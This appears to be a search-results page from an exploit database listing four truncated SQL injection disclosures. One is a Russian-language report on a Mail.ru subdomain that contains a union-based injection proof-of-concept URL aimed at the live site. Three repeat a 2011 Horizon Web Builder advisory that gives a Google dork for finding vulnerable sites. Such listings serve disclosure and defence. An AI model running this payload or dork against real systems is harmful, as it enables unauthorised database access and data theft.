4 matches found
Mail.ru: [afisha.mail.ru] SQL Injection
Добрый день. Параметр id попадает в SQL запрос без фильтрации. Вектор атаки - Union Based SQLi PoC http://mmkf.afisha.mail.ru/imgview.html?id=3713444279+and0unionselectconcatws0x2c,version,@@versioncompileos вывод в сорцах страницы - 5.0.92-community-log:unknown-linux-gnu...
Horizon Web Builder (fshow.php) SQL Injection Vulnerability
No description provided by source. Exploit Title: Horizon SQLi Google Dork: intext:Site by Horizon : inurl:uid=HORIZON3 Date: 03/05/2011 Author: Iolo Morganwg Category: Web App Version: PHP Tested on: Windows XP Vendor: http://www.horizonsolutions.tv/ Notes: Both params are vulnerable to union...
Horizon Web Builder - 'fshow.php' SQL Injection
Exploit Title: Horizon SQLi Google Dork: intext:"Site by Horizon" : inurl:"uid=HORIZON3" Date: 03/05/2011 Author: Iolo Morganwg Category: Web App Version: PHP Tested on: Windows XP Vendor: http://www.horizonsolutions.tv/ Notes: Both params are vulnerable to union based sqli Encoded URL Example...
Horizon Web Builder (fshow.php) SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Horizon SQLi Google Dork: intext:"Site by Horizon" : inurl:"uid=HORIZON3" Date: 03/05/2011 Author: Iolo Morganwg Category: Web App Version: PHP Tested on: Windows XP Vendor: http://www.horizonsolutions.tv/ Notes: Both params are...